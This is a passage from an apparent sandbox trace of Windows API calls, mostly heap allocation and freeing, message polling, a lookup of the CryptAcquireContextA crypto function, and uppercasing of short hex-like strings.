hHeap=0x25c0000) returned 1 [0257.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0257.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0257.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0257.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0257.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0257.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0257.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0257.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466df0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0257.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0257.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0257.885] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0257.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0257.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0257.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466df0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0257.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0257.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0257.885] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0257.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0257.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b39d0 | out: hHeap=0x25c0000) returned 1 [0257.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0257.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0257.886] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2940) returned 1 [0257.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0257.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0257.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0257.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0257.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0257.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0257.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0257.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0257.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0257.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0257.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0257.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0257.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0257.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0257.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0257.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0257.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0257.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0257.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0257.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0257.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0257.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0257.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0257.889] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0257.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0257.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0257.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0257.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0257.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0257.889] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0257.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0257.889] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0257.889] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0257.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0257.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0257.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0257.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0257.890] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0257.890] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.890] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0257.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0257.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0257.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0257.890] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.890] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.890] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.890] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0257.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0257.890] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0257.890] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0257.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0257.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0257.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0257.891] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0257.891] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.891] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0257.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0257.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0257.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0257.891] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.891] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0257.891] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0257.891] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0257.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0257.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0257.892] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0257.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0257.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0257.892] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0257.892] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0257.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0257.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0257.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0257.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.892] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0257.892] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.892] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0257.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0257.892] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0257.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0257.892] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0257.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0257.893] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0257.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0257.893] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0257.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0257.893] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0257.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0257.893] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0257.893] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0257.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0257.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0257.893] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0257.893] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.894] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0257.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0257.894] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0257.894] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0257.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0257.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0257.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0257.894] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0257.894] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.895] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0257.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0257.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0257.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0257.895] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.895] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0257.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0257.895] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0257.895] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0257.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0257.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0257.896] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0257.896] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.896] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0257.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0257.896] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.896] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.896] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0257.896] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0257.896] RtlAllocateHeap 